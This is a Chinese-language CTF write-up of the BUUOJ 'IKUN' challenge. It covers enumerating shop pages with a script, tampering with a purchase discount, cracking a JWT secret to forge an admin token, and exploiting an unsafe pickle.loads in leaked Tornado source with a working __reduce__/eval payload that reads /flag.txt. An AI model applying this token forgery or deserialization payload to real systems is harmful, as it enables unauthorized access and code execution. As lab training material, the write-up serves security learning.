IKUN python 反序列化

题目

过程
1.一开始提示说要买到V6，观察源码，发现/static/img/lv/lv4.png。注册之后尝试寻找V6。
观察url发现/shop?page=2。尝试写脚本匹配一下。发现在第181页。

import requests
url="http://20573976-f06b-4718-9d26-89a9471c808b.node3.buuoj.cn/shop?page="
for i in range(0,2000):
    r=requests.get(url+str(i))
    if('lv6.png') in r.text:
        print(i)
        break

• 1
• 2
• 3
• 4
• 5
• 6
• 7

2.尝试购买，发现钱不够，抓包看一下。修改折扣，显示该页面，只允许admin访问即为购买成功。


3.发现是jwt加密，放到jwt.io这个网站解密一下。

这里是我的注册名，ikun，理所应当改成admin，一开始不知道jwt的密码，就算是修改了也不对，还以为是思路错了。
破解jwt密码：github直接搜索“c-jwt-cracker-master”，里面有脚本可以直接使用。

密码为1Kun，右侧修改成如下：

4.放包，看到一键成为大会员。查看源码，发现一个zip。

下载下来发现是源码泄露，注意到 admin.py

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib

class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8
• 9
• 10
• 11
• 12
• 13
• 14
• 15
• 16
• 17
• 18
• 19
• 20
• 21
• 22

这里是python的反序列化
payload:

# coding:utf-8
#version:python2.7
import pickle
import urllib

class Test(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()" ,))

a = Test()
s = pickle.dumps(a)
print(urllib.quote(s))

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8
• 9
• 10
• 11
• 12

运行后是
c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
对当前页面抓包，将结果放到become里面，放包。

得到flag